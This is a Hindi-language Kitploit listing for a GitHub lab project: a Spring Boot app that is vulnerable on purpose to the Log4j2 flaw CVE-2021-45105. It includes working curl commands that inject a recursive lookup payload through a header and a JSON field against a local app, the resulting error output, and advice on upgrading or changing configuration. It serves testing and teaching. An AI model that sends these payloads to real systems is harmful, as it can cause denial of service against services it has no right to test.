Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
https-github.com-pravin-pp-log4j2-CVE-2021-45105-1 | Kitploit
उपकरण/GitHubGitHub/dileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubdileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1

https-github.com-pravin-pp-log4j2-CVE-2021-45105-1

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

नमूना Log4j2 असुरक्षित एप्लिकेशन (CVE-2021-45105)

प्रभावित संस्करण: 2.0-beta9 से 2.16.0 तक के सभी संस्करण

यह एप्लिकेशन CVE-2021-45105 के प्रति असुरक्षित Spring Boot वेब एप्लिकेशन पर आधारित है।

यह Log4j 2.16.0 का उपयोग करता है।

एप्लिकेशन चलाना

इसे चलाएँ:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

शोषण के चरण

  • फिर, निम्न का उपयोग करके एक्सप्लॉइट ट्रिगर करें:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • ध्यान दें कि आउटपुट इन्फिनिट लूप दिखाता है, हालाँकि परीक्षण में यह पता नहीं चला कि यह DoS संसाधन-खपत वाला है, क्योंकि इस इन्फिनिट लूप को प्रोग्राम द्वारा पहचान लिया जाता है और यह एरर देकर बाहर निकल जाता है:
root@kitploit:~

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

शमन :

Java 8 (या उससे नए) उपयोगकर्ताओं को रिलीज़ 2.17.0 में अपग्रेड करना चाहिए।

वैकल्पिक रूप से, इसे कॉन्फ़िगरेशन में शमित किया जा सकता है:

लॉगिंग कॉन्फ़िगरेशन में PatternLayout में, ${ctx:loginId} या $${ctx:loginId} जैसे Context Lookups को Thread Context Map पैटर्न (%X, %mdc, या %MDC) से बदलें। अन्यथा, कॉन्फ़िगरेशन में, ${ctx:loginId} या $${ctx:loginId} जैसे Context Lookups के संदर्भ हटा दें, जहाँ वे एप्लिकेशन के बाहरी स्रोतों जैसे HTTP हेडर या उपयोगकर्ता इनपुट से उत्पन्न होते हैं।

टूल डाउनलोड करें